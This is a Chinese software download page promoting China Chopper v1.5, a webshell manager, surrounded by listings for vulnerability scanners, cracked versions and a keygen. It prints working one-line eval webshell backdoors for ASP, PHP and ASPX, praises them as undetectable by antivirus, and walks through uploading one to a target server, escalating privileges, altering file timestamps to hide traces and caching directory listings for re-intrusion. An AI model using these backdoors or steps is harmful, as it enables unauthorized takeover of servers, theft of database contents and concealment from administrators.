HCL AppScan Standard中文補丁 v10.4.0 x64 附教程+中文教程
880KB / 12-18
HCL AppScan Standard(web安全漏洞檢測工具) v10.4.0 x64 中文免
653MB / 12-18
Acunetix Web Vulnerability Scanner(web漏洞掃描程序) v13.0.2
125MB / 05-08
WebRobot v1.54 綠色版 (網(wǎng)站注入安全掃描防護工具)
1MB / 09-06
WebRobot v1.8.2 網(wǎng)站多功能網(wǎng)絡(luò)安全滲透檢測工具
3MB / 09-06
Acunetix Web Vulnerability Scanner 11.x漢化包中文版(附注冊機
45.8MB / 05-31
IIS ShortName Scanner IIS 短文件名掃描工具(java與python打包)
87KB / 04-23
sqlmap v1.1.3 一個開源的滲透測試工具(sql注入監(jiān)測工具)
6.8MB / 03-11
國產(chǎn)Web漏洞掃描器 椰樹1.8全功能接口修復(fù)(大眾開放版本)
450KB / 08-19
椰樹1.9 接口修復(fù)版 Web漏洞掃描器最新版
450MB / 08-19
詳情介紹
中國菜刀 (chopper) 是國內(nèi)牛人開發(fā)的方便的檢測后門是否可以利用,方便站長做網(wǎng)站安全檢測。最近有好心的朋友提供了我們的一些不維護網(wǎng)站的存在注入問題的幾個頁面,正好用這個工具檢測了下, 要不是服務(wù)器安全設(shè)置好了, 否則什么都是別人的了。
解壓密碼:okjb51
如果你是站長,你還在用FTP來管理你的網(wǎng)站嗎?
為什么不試一下“中國菜刀”呢,這是一款專業(yè)的網(wǎng)站管理工具。
用途廣泛,使用方便,小巧實用。
同時,還能連接管理幾乎所有主流的數(shù)據(jù)庫。
支持的網(wǎng)站腳本有:PHP,ASP.NET,ASP, 后續(xù)將支持其它網(wǎng)站腳本的連接管理。
其它功能:WEB瀏覽器(POST瀏覽/自定義COOKIE瀏覽/自定義JS),網(wǎng)站爬行(自動保存目錄結(jié)構(gòu)),WEB安全掃描。
在非簡體中文環(huán)境下使用,自動切換到英文界面。
說起菜刀,就不得不提起菜刀的作者,作者是一個退伍軍人,生長在一個貧窮的農(nóng)村,據(jù)說初中也沒讀完,英語更是不咋地,但他卻自學(xué)掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand等等,當(dāng)初在六七年前臺灣鬧獨立的時候,他在國民黨和民進黨的網(wǎng)站上留下了“只有一個中國”的黑頁,一舉成名。
作者是一個樸實,低調(diào)的技術(shù)牛人,他這些年留下的作品很多,中國菜刀是他最新的一個作品,從他之前的作品WEBSHELL管理器的基礎(chǔ)上修改而來,功能更加的強大。
你見過很強大的ASP后門,很強大的PHP后門,很強大的ASPX后門,那你見過很強大的asp,aspx,php三合一后門么........,沒有吧,尤其是這個后門,只有一句話。
Asp環(huán)境:<%eval request("a")%>
Php環(huán)境:<?php @eval($_POST['a']);?>
Aspx環(huán)境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>
是不是很震憾,很不可思議,是的,我剛接觸的時候,也是這樣的想法,就這三句話,一個名不見經(jīng)傳的“中國菜刀”,就可以代替我那搜集了幾年,大大小小幾百個多種平臺多種環(huán)境的腳本后門?,事實證明,我錯了,原來“中國菜刀”不僅僅可以代替那些后門,而且他的功能超出我的想象,就讓我慢慢說明吧。
1.就從最基本的講起,你的腳本是不是經(jīng)常被殺,你怎么變形都被殺,,傳到服務(wù)器被殺導(dǎo)致被管理員發(fā)現(xiàn),結(jié)果你的權(quán)限就沒了,殺到你欲哭無淚。菜刀的一句話后門,可以避免這個問題,只有短短的一行代碼,永遠不會被查殺。
2.你是不是很郁悶?zāi)愕暮箝T傳到服務(wù)器上連他媽都不認識了,框架變形,字體變框框,點擊菜單無效,這個是因為系統(tǒng)語言不兼容造成的,菜刀是UINCODE方式編譯,支持多國語言輸入顯示,完全不存在兼容性問題。
3.你是不是有很多webshell,你每次都拿記事本記下來,需要的時候,又去翻半天,弄得你很累很沒脾氣。有了“菜刀”,你可以很方便管理你的webshell,所有的記錄都保存在加密的本地數(shù)據(jù)庫里,而且支持webshell分類,讓你管理得井井有條。菜刀不僅有臨時鎖定功能,方便你離開電腦的那小會時間不被別人偷你的webshell,也有加密功能,不輸對密碼,HOHO,偷了你的數(shù)據(jù)也沒用。
4.再來說說數(shù)據(jù)庫管理,這個是菜刀最最強大的功能,精通各平臺主流數(shù)據(jù)庫的作者,把這個功能寫的是淋漓盡致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等數(shù)據(jù)庫,支持不是最主要的,功能強大,人性化才是最主要的,“菜刀”的數(shù)據(jù)庫操作界面,內(nèi)置了常用的數(shù)據(jù)庫語句,非常直觀的表列名瀏覽功能,自動顯示表名,列名,查詢語句,非常人性化的設(shè)計,更內(nèi)置了不少自建的函數(shù),方便不懂?dāng)?shù)據(jù)庫的菜鳥,都能查閱數(shù)據(jù)庫里的數(shù)據(jù),再說個“菜刀”數(shù)據(jù)庫管理的一個小技巧,對于access數(shù)據(jù)庫,可以在菜刀的webshell操作界面,對著MDB文件點右鍵,點Access Management,就直接進入Access的數(shù)據(jù)庫操作界面了,方便吧,嘿嘿??!
5.再說說提權(quán)這塊,webshell的提權(quán)總是最讓人關(guān)心的,說到提權(quán),就不能說到webshell上的cmd執(zhí)行了,有些朋友并不了解菜刀的自定義CMD路徑功能,有兩種方法可以設(shè)置指定的cmd路徑,一就是在cmd操作界面,輸入setp d:\cmd.exe,就可以了,或者把cmd.exe上傳到目錄,然后點右鍵,點virtual terminal file,就可以進入自定義CMD.EXE路徑的命令行了,同樣的,再給個cmd使用的小技巧,在菜刀的命令行里,可以使用cd等命令跳轉(zhuǎn)目錄,方便吧,嘿嘿??!嗯,另外,新版菜刀新增常用目錄管理功能,你可以把你常用的目錄或者提權(quán)的目錄加進菜刀里,這樣很方便你提權(quán)或者日常工作,是不是比那些固定了提權(quán)目錄的腳本后門要牛B的多啊,哈哈。
6.還有菜刀的webshell上的文件功能功能,也是非常人性化的,文件夾和文件的圖標(biāo)完全模枋windows,,文件日期,文件大小,文件權(quán)限,一目了然,尤其是修改文件時間功能,非常的方便,直接對著要修改時間的文件點右鍵,modify the file time,然后在文件的時間那欄,輸入時間,回車,就修改完了。當(dāng)然,菜刀的文件管理還有新建,刪除,上傳,下載,編輯功能,這些大同小異,就不一一細說了。不過有個功能,還是要重點說明的,那就是目錄緩存功能,菜刀可以把瀏覽過的webshell目錄都緩存在本地,這樣可以方便下次訪問的時候更加快捷,最重要的是,當(dāng)哪天你的權(quán)限丟了,起碼你還有對方服務(wù)器的文件目錄結(jié)構(gòu),方便再一次滲透。
說完大家都有的腳本后門功能,現(xiàn)在來說點特別的菜刀功能,非常特別跟實用的哦。菜刀的前身是WEBSHELL管理器,再結(jié)合了作者之前的web管理軟件等幾個工具的優(yōu)點,實在是大殺器的集合體。
使用方法
這里以php為例
首先我們先將php一句話木馬上傳到目標(biāo)服務(wù)器中,用菜刀去嘗試連接
在地址中填寫上傳一句話木馬的地址,在后面的方框中填寫所要連接的參數(shù)(也就是代碼中的’x’)
打開菜刀,空白處右鍵添加
設(shè)置好后我們雙擊點開
填入地址、密碼 等參數(shù)
添加完成之后就可以對目標(biāo)服務(wù)器進行控制,可以對文件進行相關(guān)的操作,也可以對數(shù)據(jù)庫進行操作,也可以創(chuàng)建一個用戶。
我們將a.txt刪除,然后去服務(wù)器上查看,發(fā)現(xiàn)服務(wù)器上的a.txt文件也被刪除了,這就是利用了上傳漏洞進行攻擊。
更新日志
最新版本1.5,官方已經(jīng)無法訪問,建議再虛擬機中執(zhí)行,以防止有后門。
下載地址
人氣軟件
X-Scan v3.3 好用的端口掃描 簡體中文版
入侵掃描工具(SFind.exe) v1.85 綠色版
網(wǎng)絡(luò)漏洞掃描工具 Acunetix Web Vulnerability Scanner 8.x 全功
WebRobot v1.8.2 網(wǎng)站多功能網(wǎng)絡(luò)安全滲透檢測工具
手工注入幫助系統(tǒng) t00ls大牛寫的
網(wǎng)站漏洞掃描大師 V1.0 中文綠色免費版
安全掃描工具 NetSparker V3.5.4 特別版
MySQL注入檢查工具 用了檢查程序是否有注入
Acunetix Web Vulnerability Scanner(web漏洞掃描程序) v13.0.2
Marathon Tool 漢化版 基于時間的SQL盲注工具
相關(guān)文章
-
HCL AppScan Standard中文補丁 v10.4.0 x64 附教程+中文教程
HCLAppScan Standard中文補丁下載,HCLAppScan Standard 中文激活版是一款市場領(lǐng)先的應(yīng)用安全軟件,強大的 DevSecOps 可查明應(yīng)用程序漏洞,允許在開發(fā)生命周期的每個階段進...
-
HCL AppScan Standard(web安全漏洞檢測工具) v10.4.0 x64 中文免費版 附圖文教程
HCLAppScan Standard中文免費版是一款市場領(lǐng)先的應(yīng)用安全軟件,強大的 DevSecOps 可查明應(yīng)用程序漏洞,允許在開發(fā)生命周期的每個階段進行快速修復(fù),HCL AppScan 提供一流的...
-
Acunetix Web Vulnerability Scanner(web漏洞掃描程序) v13.0.2 中文特別版(附安裝教程)
Acunetix Web Vulnerability Scanner是一款web漏洞檢測軟件,可以幫助用戶檢測和掃描出web的漏洞,對用戶進行提醒,好讓用戶能及時對漏洞進行修復(fù),歡迎下載使用...
-
WebRobot v1.54 綠色版 (網(wǎng)站注入安全掃描防護工具)
WebRobot僅用于檢測Web安全性能,請勿用作非法用途...
-
WebRobot v1.8.2 網(wǎng)站多功能網(wǎng)絡(luò)安全滲透檢測工具
最新版的Webrobot使用的是插件模式,插件存放在主程序目錄下的plugin文件夾里,所有插件的配置文件及字典等其他文件也存放在這個文件夾內(nèi)。我們需要用到哪個插件,只需要雙...
-
Acunetix Web Vulnerability Scanner 11.x漢化包中文版(附注冊機)
Acunetix Web Vulnerability Scanner 11.x漢化包是最新Acunetix 11的漢化補丁包。新版本集成了漏洞管理功能來擴展企業(yè)全面管理、優(yōu)先級和控制漏洞威脅的能力...
下載聲明
☉ 解壓密碼:chabaoo.cn 就是本站主域名,希望大家看清楚,[ 分享碼的獲取方法 ]可以參考這篇文章
☉ 推薦使用 [ 迅雷 ] 下載,使用 [ WinRAR v5 ] 以上版本解壓本站軟件。
☉ 如果這個軟件總是不能下載的請在評論中留言,我們會盡快修復(fù),謝謝!
☉ 下載本站資源,如果服務(wù)器暫不能下載請過一段時間重試!或者多試試幾個下載地址
☉ 如果遇到什么問題,請評論留言,我們定會解決問題,謝謝大家支持!
☉ 本站提供的一些商業(yè)軟件是供學(xué)習(xí)研究之用,如用于商業(yè)用途,請購買正版。
☉ 本站提供的中國菜刀 (chopper) v1.5 網(wǎng)站后門檢測利用工具資源來源互聯(lián)網(wǎng),版權(quán)歸該下載資源的合法擁有者所有。